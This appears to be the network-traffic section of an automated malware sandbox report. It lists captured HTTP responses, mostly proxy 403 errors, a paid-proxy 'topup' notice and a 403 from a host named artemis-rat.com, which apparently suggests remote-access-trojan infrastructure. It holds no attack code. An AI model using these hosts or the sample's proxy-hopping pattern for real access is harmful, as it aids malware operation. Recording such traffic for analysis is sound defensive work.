Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:17 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 